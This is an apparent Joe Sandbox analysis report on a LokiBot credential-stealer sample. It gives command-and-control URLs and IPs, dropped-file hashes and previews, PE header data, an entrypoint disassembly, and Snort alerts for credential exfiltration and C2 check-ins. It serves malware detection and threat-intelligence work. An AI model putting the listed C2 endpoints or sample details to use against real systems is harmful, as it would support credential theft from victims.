                74f26d34ffff049368a6cff8812f86ee.gq13%VirustotalBrowse

                URLs

                SourceDetectionScannerLabelLink
                http://74f26d34ffff049368a6cff8812f86ee.gq/BN111/fre.php16%VirustotalBrowse
                http://74f26d34ffff049368a6cff8812f86ee.gq/BN111/fre.php100%Avira URL Cloudmalware
                http://kbfvzoboss.bid/alien/fre.php0%URL Reputationsafe
                http://alphastand.win/alien/fre.php0%URL Reputationsafe
                http://alphastand.trade/alien/fre.php0%URL Reputationsafe
                http://alphastand.top/alien/fre.php0%URL Reputationsafe
                http://www.ibsensoftware.com/0%URL Reputationsafe
                http://74f26d34ffff049368a6cff8812f86ee.gq/BN111/fre.phpA0%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                74f26d34ffff049368a6cff8812f86ee.gq
                172.67.219.104
                truetrueunknown

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://74f26d34ffff049368a6cff8812f86ee.gq/BN111/fre.phptrue
                • 16%, Virustotal, Browse
                • Avira URL Cloud: malware
                unknown
                http://kbfvzoboss.bid/alien/fre.phptrue
                • URL Reputation: safe
                unknown
                http://alphastand.win/alien/fre.phptrue
                • URL Reputation: safe
                unknown
                http://alphastand.trade/alien/fre.phptrue
                • URL Reputation: safe
                unknown
                http://alphastand.top/alien/fre.phptrue
                • URL Reputation: safe
                unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://nsis.sf.net/NSIS_ErroraZOmps0Ug8.exefalse
                  high
                  http://nsis.sf.net/NSIS_ErrorErroraZOmps0Ug8.exefalse
                    high
                    http://www.ibsensoftware.com/aZOmps0Ug8.exe, aZOmps0Ug8.exe, 00000001.00000001.351943759.0000000000400000.00000040.00020000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    http://74f26d34ffff049368a6cff8812f86ee.gq/BN111/fre.phpAaZOmps0Ug8.exe, 00000001.00000002.612017929.0000000000658000.00000004.00000020.sdmptrue
                    • Avira URL Cloud: safe
                    unknown

                    Contacted IPs

                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs

                    Public

                    IPDomainCountryFlagASNASN NameMalicious
                    172.67.219.104
                    74f26d34ffff049368a6cff8812f86ee.gqUnited States
                    13335CLOUDFLARENETUStrue
                    104.21.62.32
                    unknownUnited States
                    13335CLOUDFLARENETUStrue

                    Private

                    IP
                    192.168.2.1

                    General Information

                    Joe Sandbox Version:33.0.0 White Diamond
                    Analysis ID:502657
                    Start date:14.10.2021
                    Start time:08:27:12
                    Joe Sandbox Product:CloudBasic
                    Overall analysis duration:0h 7m 22s
                    Hypervisor based Inspection enabled:false
                    Report type:light
                    Sample file name:aZOmps0Ug8 (renamed file extension from none to exe)
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                    Number of analysed new started processes analysed:22
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • HDC enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Detection:MAL
                    Classification:mal100.troj.spyw.evad.winEXE@3/4@81/3
                    EGA Information:Failed
                    HDC Information:
                    • Successful, ratio: 80.6% (good quality ratio 76.4%)
                    • Quality average: 80.6%
                    • Quality standard deviation: 28.6%
                    HCA Information:
                    • Successful, ratio: 82%
                    • Number of executed functions: 0
                    • Number of non-executed functions: 0
                    Cookbook Comments:
                    • Adjust boot time
                    • Enable AMSI
                    Warnings:
                    Show All
                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, dllhost.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                    • HTTP Packets have been reduced
                    • TCP Packets have been reduced to 100
                    • Excluded IPs from analysis (whitelisted): 23.203.141.148, 20.50.102.62, 2.20.178.56, 2.20.178.10, 20.54.110.249, 40.112.88.60, 2.20.178.24, 2.20.178.33, 95.100.216.89, 20.82.210.154
                    • Excluded domains from analysis (whitelisted): store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a767.dspw65.akamai.net, a1449.dscg2.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, e12564.dspb.akamaiedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu-shim.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, download.windowsupdate.com.edgesuite.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size getting too big, too many NtDeviceIoControlFile calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.

                    Simulations

                    Behavior and APIs

                    TimeTypeDescription
                    08:28:20API Interceptor78x Sleep call for process: aZOmps0Ug8.exe modified

                    Joe Sandbox View / Context

                    IPs

                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                    172.67.219.104Bank Details.xlsxGet hashmaliciousBrowse
                    • 74f26d34ffff049368a6cff8812f86ee.gq/BN111/fre.php
                    QGBN7om1fc.exeGet hashmaliciousBrowse
                    • 74f26d34ffff049368a6cff8812f86ee.gq/BN111/fre.php
                    11882.xlsxGet hashmaliciousBrowse
                    • 74f26d34ffff049368a6cff8812f86ee.gq/BN111/fre.php
                    Vgcx5Y4HKH.exeGet hashmaliciousBrowse
                    • 74f26d34ffff049368a6cff8812f86ee.gq/BN111/fre.php
                    JtdPd3UkrM.exeGet hashmaliciousBrowse
                    • 74f26d34ffff049368a6cff8812f86ee.gq/BN111/fre.php
                    Notification.xlsxGet hashmaliciousBrowse
                    • 74f26d34ffff049368a6cff8812f86ee.gq/BN111/fre.php
                    FOSaObIu24.exeGet hashmaliciousBrowse
                    • 74f26d34ffff049368a6cff8812f86ee.gq/BN111/fre.php
                    Payment Advice.xlsxGet hashmaliciousBrowse
                    • 74f26d34ffff049368a6cff8812f86ee.gq/BN111/fre.php
                    104.21.62.32Bank Details.xlsxGet hashmaliciousBrowse
                    • 74f26d34ffff049368a6cff8812f86ee.gq/BN111/fre.php
                    QGBN7om1fc.exeGet hashmaliciousBrowse
                    • 74f26d34ffff049368a6cff8812f86ee.gq/BN111/fre.php
                    11882.xlsxGet hashmaliciousBrowse
                    • 74f26d34ffff049368a6cff8812f86ee.gq/BN111/fre.php
                    Vgcx5Y4HKH.exeGet hashmaliciousBrowse
                    • 74f26d34ffff049368a6cff8812f86ee.gq/BN111/fre.php
                    JtdPd3UkrM.exeGet hashmaliciousBrowse
                    • 74f26d34ffff049368a6cff8812f86ee.gq/BN111/fre.php
                    Notification.xlsxGet hashmaliciousBrowse
                    • 74f26d34ffff049368a6cff8812f86ee.gq/BN111/fre.php
                    FOSaObIu24.exeGet hashmaliciousBrowse
                    • 74f26d34ffff049368a6cff8812f86ee.gq/BN111/fre.php
                    Payment Advice.xlsxGet hashmaliciousBrowse
                    • 74f26d34ffff049368a6cff8812f86ee.gq/BN111/fre.php

                    Domains

                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                    74f26d34ffff049368a6cff8812f86ee.gqBank Details.xlsxGet hashmaliciousBrowse
                    • 172.67.219.104
                    QGBN7om1fc.exeGet hashmaliciousBrowse
                    • 104.21.62.32
                    11882.xlsxGet hashmaliciousBrowse
                    • 104.21.62.32
                    Vgcx5Y4HKH.exeGet hashmaliciousBrowse
                    • 104.21.62.32
                    JtdPd3UkrM.exeGet hashmaliciousBrowse
                    • 172.67.219.104
                    Notification.xlsxGet hashmaliciousBrowse
                    • 104.21.62.32
                    FOSaObIu24.exeGet hashmaliciousBrowse
                    • 172.67.219.104
                    Payment Advice.xlsxGet hashmaliciousBrowse
                    • 104.21.62.32

                    ASN

                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                    CLOUDFLARENETUSk00FzM4fb3.exeGet hashmaliciousBrowse
                    • 104.21.26.237
                    hQQe6WqUOP.exeGet hashmaliciousBrowse
                    • 162.159.133.233
                    0JckmrUWzC.exeGet hashmaliciousBrowse
                    • 172.67.143.100
                    8Yhzfjf0tx.exeGet hashmaliciousBrowse
                    • 172.67.168.153
                    GR01DtRd0N.exeGet hashmaliciousBrowse
                    • 162.159.133.233
                    TqSDHvsKpt.exeGet hashmaliciousBrowse
                    • 162.159.129.233
                    Bank Details.xlsxGet hashmaliciousBrowse
                    • 104.21.62.32
                    fYkew3tmy4.exeGet hashmaliciousBrowse
                    • 172.67.188.154
                    Wellis Inquiry.exeGet hashmaliciousBrowse
                    • 104.21.2.218
                    Halkbank,pdf.exeGet hashmaliciousBrowse
                    • 172.67.188.154
                    Asperiores.exeGet hashmaliciousBrowse
                    • 172.67.177.45
                    jew.arm7Get hashmaliciousBrowse
                    • 104.30.5.105
                    Dbvisualizer-Licence_982671065.exeGet hashmaliciousBrowse
                    • 172.67.177.45
                    EaZ0UhBdLE.exeGet hashmaliciousBrowse
                    • 104.21.26.237
                    Purchase Order PO-1000837 from LAW TRANSPORT.htmlGet hashmaliciousBrowse
                    • 104.16.19.94
                    hoho.arm7Get hashmaliciousBrowse
                    • 104.27.20.79
                    hoho.x86Get hashmaliciousBrowse
                    • 172.70.21.0
                    #Ud83d#Udcde-youse.guia-644-46204-282109.htmGet hashmaliciousBrowse
                    • 104.16.18.94
                    tmDSSwkOAMGet hashmaliciousBrowse
                    • 172.68.102.160
                    oIKRh1ruPM.exeGet hashmaliciousBrowse
                    • 162.159.130.233

                    JA3 Fingerprints

                    No context

                    Dropped Files

                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                    C:\Users\user\AppData\Local\Temp\nsj1540.tmp\mahyiit.dllBank Details.xlsxGet hashmaliciousBrowse

                      Created / dropped Files

                      C:\Users\user\AppData\Local\Temp\96w0bq54qhi02
                      Process:C:\Users\user\Desktop\aZOmps0Ug8.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):217921
                      Entropy (8bit):7.989316240408084
                      Encrypted:false
                      SSDEEP:6144:lURBaQUyhxMk5O9VK/zHl/hfjB9i4laUw+I:lYUyvMC/jXjrH3I
                      MD5:D6B090A9F226F60E8C2514C17AC0ACAE
                      SHA1:95852FEF4218FD1620E8AE8425A29332B1AA8403
                      SHA-256:DF082B249FD67FDAF005CC9ED5C047DE2914995F41AB72CD35B18CF661AB27CC
                      SHA-512:91DA3ED8442E03CEA52DEEC0C0266A19FBEC2EFD4475CCC05C5FD9A9212A8C715981F94BD17EB16EE0AD880785544E3A41AC56E195C6C03DEB3B433EEDE3FCC7
                      Malicious:false
                      Reputation:low
                      Preview: ..:.}w%.. .#.'..i5...O..m_..6.Hx.@/.w3+.b.....eWu.8.....?..m..M*..".<qP....>+1............N"{a._(*........iF|./`t..#u....6.X.!/..p,....U).t..2{:...-.d61.........:..}W.R..1Ea_N.;c~...b..E..K..m2X...E.>^...#..5....... .AQ~..|pl3...s!.........c...fwG.J..#...Y.......m_q.6....@/.w3..b....e.u.8........m.i..*.`..d..G+..O.Q>..d5.....n.s..]S.......GD..!.}...V..#u....6.....l\uwO.Lu!.k....*ko&,p.W......8Iw`.....C.... ...)+..c..z...........,m...vz.(6...J....<;..lbJf...|p.N..K.I.x.Bg....c...w%.. .#K......x.......m_..6..x.@..w3+.b.....eWu.8.{h......m)d..*Q...:...x..O..>..d5.....O...]S........GD....#...l..#u....6.....l.uwO.Lu!.k....*ko&,p.W......8Iw`.....C.... ...)+..c..z............,m...vz.(6...J....<;..l.AQ~..|p.:..KOI.x.g....c...w%.. .#....i5...&..m_..6.Hx.@/.w3+.b.....eWu.8........m.u.*{`..d...+..O..>..d5.....O.s..]S........GD....#...V..#u....6.....l\uwO.Lu!.k....*ko&,p.W......8Iw`.....C.... ...)+..c..z............,m...vz.(6...J....<;..l
                      C:\Users\user\AppData\Local\Temp\nsj1540.tmp\mahyiit.dll
                      Process:C:\Users\user\Desktop\aZOmps0Ug8.exe
                      File Type:PE32 executable (DLL) (native) Intel 80386, for MS Windows
                      Category:dropped
                      Size (bytes):107520
                      Entropy (8bit):6.386049451747606
                      Encrypted:false
                      SSDEEP:1536:wmFgGAZxpEuLPsu0NR7mNzUK2q8fIrzcYyKkRrIAHaqsWnvf3WklE9ncobUfsirl:FFgGAaus+eyvKjxlErGrz
                      MD5:B5D0F9FBB3DF9A1A42B479FDD334417C
                      SHA1:F0780DBAFBDB20235C97A28CC0AD8E1ABC1547F3
                      SHA-256:0EAEC60342B2074DA968F010E592AD52C8B7DBFD72759B97F999F0EB88861136
                      SHA-512:3BD39726FEB5B0B946E6B29C17A12BA044BF2D0E5374C217527542A6A6F09F65E3944007D0427936178E5C485BEDE8631CAA5738D0BE50AC291759FCDD4EC26F
                      Malicious:false
                      Joe Sandbox View:
                      • Filename: Bank Details.xlsx, Detection: malicious, Browse
                      Reputation:low
                      Preview: MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....mga...........!....."...~.......*..............................................................................<...M...........................................................................h]..H............................................text.... .......".................. ..`.rdata...V...@...X...&..............@..@.data....B.......$...~..............@....rsrc...............................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      C:\Users\user\AppData\Roaming\C79A3B\B52B3F.lck
                      Process:C:\Users\user\Desktop\aZOmps0Ug8.exe
                      File Type:very short file (no magic)
                      Category:dropped
                      Size (bytes):1
                      Entropy (8bit):0.0
                      Encrypted:false
                      SSDEEP:3:U:U
                      MD5:C4CA4238A0B923820DCC509A6F75849B
                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                      Malicious:false
                      Reputation:high, very likely benign file
                      Preview: 1
                      C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3853321935-2125563209-4053062332-1002\21c8026919fd094ab07ec3c180a9f210_d06ed635-68f6-4e9a-955c-4899f5f57b9a
                      Process:C:\Users\user\Desktop\aZOmps0Ug8.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):49
                      Entropy (8bit):1.2701062923235522
                      Encrypted:false
                      SSDEEP:3:/l1PL3n:fPL3
                      MD5:CD8FA61AD2906643348EEF98A988B873
                      SHA1:0B10E2F323B5C73F3A6EA348633B62AE522DDF39
                      SHA-256:49A11A24821F2504B8C91BA9D8A6BD6F421ED2F0212C1C771BF1CAC9DE32AD75
                      SHA-512:1E6F44AB3231232221CF0F4268E96A13C82E3F96249D7963B78805B693B52D3EBDABF873DB240813DF606D8C207BD2859338D67BA94F33ECBA43EA9A4FEFA086
                      Malicious:false
                      Reputation:moderate, very likely benign file
                      Preview: ........................................user.

                      Static File Info

                      General

                      File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                      Entropy (8bit):7.93701459995172
                      TrID:
                      • Win32 Executable (generic) a (10002005/4) 99.96%
                      • Generic Win/DOS Executable (2004/3) 0.02%
                      • DOS Executable Generic (2002/1) 0.02%
                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                      File name:aZOmps0Ug8.exe
                      File size:283552
                      MD5:70d177abc7455c709ae9710630b9ea49
                      SHA1:4d81e55880a35c0157046560eca20b9f528838f4
                      SHA256:b87ecdb8035fa8b5ce87570d757265182a9f49122a02e77dc7f414816cf4b511
                      SHA512:25fd5fa3de0e8bfb89695b3ce55dbeb059eaaaef4a8d9cd4e503f1ccda379cc0ba550354aee59445876c1ea1244d3d696ecfd7e964f3ce0f328a83f48c5ce24c
                      SSDEEP:6144:wBlL/cVBMRm3NqjXSfxgGNoYnUC9jIVUp6Uxgo9+n1J8UA:CeVj9+XI/NoYxpWV4go9afA
                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........0(..QF..QF..QF.*^...QF..QG.qQF.*^...QF..rv..QF..W@..QF.Rich.QF.........PE..L...e:.V.................\...........0.......p....@

                      File Icon

                      Icon Hash:b2a88c96b2ca6a72

                      Static PE Info

                      General

                      Entrypoint:0x4030fb
                      Entrypoint Section:.text
                      Digitally signed:false
                      Imagebase:0x400000
                      Subsystem:windows gui
                      Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                      DLL Characteristics:TERMINAL_SERVER_AWARE
                      Time Stamp:0x56FF3A65 [Sat Apr 2 03:20:05 2016 UTC]
                      TLS Callbacks:
                      CLR (.Net) Version:
                      OS Version Major:4
                      OS Version Minor:0
                      File Version Major:4
                      File Version Minor:0
                      Subsystem Version Major:4
                      Subsystem Version Minor:0
                      Import Hash:b76363e9cb88bf9390860da8e50999d2

                      Entrypoint Preview

                      Instruction
                      sub esp, 00000184h
                      push ebx
                      push ebp
                      push esi
                      push edi
                      xor ebx, ebx
                      push 00008001h
                      mov dword ptr [esp+20h], ebx
                      mov dword ptr [esp+14h], 00409168h
                      mov dword ptr [esp+1Ch], ebx
                      mov byte ptr [esp+18h], 00000020h
                      call dword ptr [004070B0h]
                      call dword ptr [004070ACh]
                      cmp ax, 00000006h
                      je 00007FC0C4CD96E3h
                      push ebx
                      call 00007FC0C4CDC4C4h
                      cmp eax, ebx
                      je 00007FC0C4CD96D9h
                      push 00000C00h
                      call eax
                      mov esi, 00407280h
                      push esi
                      call 00007FC0C4CDC440h
                      push esi
                      call dword ptr [00407108h]
                      lea esi, dword ptr [esi+eax+01h]
                      cmp byte ptr [esi], bl
                      jne 00007FC0C4CD96BDh
                      push 0000000Dh
                      call 00007FC0C4CDC498h
                      push 0000000Bh
                      call 00007FC0C4CDC491h
                      mov dword ptr [00423F44h], eax
                      call dword ptr [00407038h]
                      push ebx
                      call dword ptr [0040726Ch]
                      mov dword ptr [00423FF8h], eax
                      push ebx
                      lea eax, dword ptr [esp+38h]
                      push 00000160h
                      push eax
                      push ebx
                      push 0041F4F0h
                      call dword ptr [0040715Ch]
                      push 0040915Ch
                      push 00423740h
                      call 00007FC0C4CDC0C4h
                      call dword ptr [0040710Ch]
                      mov ebp, 0042A000h
                      push eax
                      push ebp
                      call 00007FC0C4CDC0B2h
                      push ebx
                      call dword ptr [00407144h]

                      Rich Headers

                      Programming Language:
                      • [EXP] VC++ 6.0 SP5 build 8804

                      Data Directories

                      NameVirtual AddressVirtual Size Is in Section
                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_IMPORT0x74180xa0.rdata
                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x2d0000x9e0.rsrc
                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_IAT0x70000x27c.rdata
                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                      Sections

                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                      .text0x10000x5aeb0x5c00False0.665123980978data6.42230569414IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      .rdata0x70000x11960x1200False0.458984375data5.20291736659IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                      .data0x90000x1b0380x600False0.432291666667data4.0475118296IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                      .ndata0x250000x80000x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                      .rsrc0x2d0000x9e00xa00False0.45625data4.50948350161IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                      Resources

                      NameRVASizeTypeLanguageCountry
                      RT_ICON0x2d1900x2e8dataEnglishUnited States
                      RT_DIALOG0x2d4780x100dataEnglishUnited States
                      RT_DIALOG0x2d5780x11cdataEnglishUnited States
                      RT_DIALOG0x2d6980x60dataEnglishUnited States
                      RT_GROUP_ICON0x2d6f80x14dataEnglishUnited States
                      RT_MANIFEST0x2d7100x2ccXML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States

                      Imports

                      DLLImport
                      KERNEL32.dllGetTickCount, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, SetFileAttributesA, CompareFileTime, SearchPathA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, GetWindowsDirectoryA, GetTempPathA, Sleep, lstrcmpiA, GetVersion, SetErrorMode, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, GetLastError, CreateDirectoryA, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, lstrcatA, GetSystemDirectoryA, WaitForSingleObject, SetFileTime, CloseHandle, GlobalFree, lstrcmpA, ExpandEnvironmentStringsA, GetExitCodeProcess, GlobalAlloc, lstrlenA, GetCommandLineA, GetProcAddress, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, ReadFile, FindClose, GetPrivateProfileStringA, WritePrivateProfileStringA, WriteFile, MulDiv, MultiByteToWideChar, LoadLibraryExA, GetModuleHandleA, FreeLibrary
                      USER32.dllSetCursor, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, EndDialog, ScreenToClient, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetForegroundWindow, GetWindowLongA, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, SetTimer, PostQuitMessage, SetWindowLongA, SendMessageTimeoutA, LoadImageA, wsprintfA, GetDlgItem, FindWindowExA, IsWindow, SetClipboardData, EmptyClipboard, OpenClipboard, EndPaint, CreateDialogParamA, DestroyWindow, ShowWindow, SetWindowTextA
                      GDI32.dllSelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                      SHELL32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, SHFileOperationA, ShellExecuteA
                      ADVAPI32.dllRegDeleteValueA, SetFileSecurityA, RegOpenKeyExA, RegDeleteKeyA, RegEnumValueA, RegCloseKey, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
                      COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                      ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

                      Possible Origin

                      Language of compilation systemCountry where language is spokenMap
                      EnglishUnited States

                      Network Behavior

                      Snort IDS Alerts

                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                      10/14/21-08:28:19.047157TCP2024312ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M14977980192.168.2.6172.67.219.104
                      10/14/21-08:28:19.047157TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4977980192.168.2.6172.67.219.104
                      10/14/21-08:28:19.047157TCP2025381ET TROJAN LokiBot Checkin4977980192.168.2.6172.67.219.104
                      10/14/21-08:28:19.047157TCP2024317ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M24977980192.168.2.6172.67.219.104
                      10/14/21-08:28:20.347127TCP2024312ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M14978080192.168.2.6172.67.219.104
                      10/14/21-08:28:20.347127TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978080192.168.2.6172.67.219.104
                      10/14/21-08:28:20.347127TCP2025381ET TROJAN LokiBot Checkin4978080192.168.2.6172.67.219.104
                      10/14/21-08:28:20.347127TCP2024317ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M24978080192.168.2.6172.67.219.104
                      10/14/21-08:28:21.339482TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978180192.168.2.6104.21.62.32
                      10/14/21-08:28:21.339482TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978180192.168.2.6104.21.62.32
                      10/14/21-08:28:21.339482TCP2025381ET TROJAN LokiBot Checkin4978180192.168.2.6104.21.62.32
                      10/14/21-08:28:21.339482TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978180192.168.2.6104.21.62.32
                      10/14/21-08:28:22.592928TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978280192.168.2.6104.21.62.32
                      10/14/21-08:28:22.592928TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978280192.168.2.6104.21.62.32
                      10/14/21-08:28:22.592928TCP2025381ET TROJAN LokiBot Checkin4978280192.168.2.6104.21.62.32
                      10/14/21-08:28:22.592928TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978280192.168.2.6104.21.62.32
                      10/14/21-08:28:23.792482TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978380192.168.2.6172.67.219.104
                      10/14/21-08:28:23.792482TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978380192.168.2.6172.67.219.104
                      10/14/21-08:28:23.792482TCP2025381ET TROJAN LokiBot Checkin4978380192.168.2.6172.67.219.104
                      10/14/21-08:28:23.792482TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978380192.168.2.6172.67.219.104
                      10/14/21-08:28:24.885116TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978480192.168.2.6172.67.219.104
                      10/14/21-08:28:24.885116TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978480192.168.2.6172.67.219.104
                      10/14/21-08:28:24.885116TCP2025381ET TROJAN LokiBot Checkin4978480192.168.2.6172.67.219.104
                      10/14/21-08:28:24.885116TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978480192.168.2.6172.67.219.104
                      10/14/21-08:28:26.025162TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978580192.168.2.6104.21.62.32
                      10/14/21-08:28:26.025162TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978580192.168.2.6104.21.62.32
                      10/14/21-08:28:26.025162TCP2025381ET TROJAN LokiBot Checkin4978580192.168.2.6104.21.62.32
                      10/14/21-08:28:26.025162TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978580192.168.2.6104.21.62.32
                      10/14/21-08:28:27.340972TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978680192.168.2.6172.67.219.104
                      10/14/21-08:28:27.340972TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978680192.168.2.6172.67.219.104
                      10/14/21-08:28:27.340972TCP2025381ET TROJAN LokiBot Checkin4978680192.168.2.6172.67.219.104
                      10/14/21-08:28:27.340972TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978680192.168.2.6172.67.219.104
                      10/14/21-08:28:30.289742TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978780192.168.2.6172.67.219.104
                      10/14/21-08:28:30.289742TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978780192.168.2.6172.67.219.104
                      10/14/21-08:28:30.289742TCP2025381ET TROJAN LokiBot Checkin4978780192.168.2.6172.67.219.104
                      10/14/21-08:28:30.289742TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24978780192.168.2.6172.67.219.104
                      10/14/21-08:28:31.397798TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14978880192.168.2.6172.67.219.104
                      10/14/21-08:28:31.397798TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4978880192.168.2.6172.67.219.104
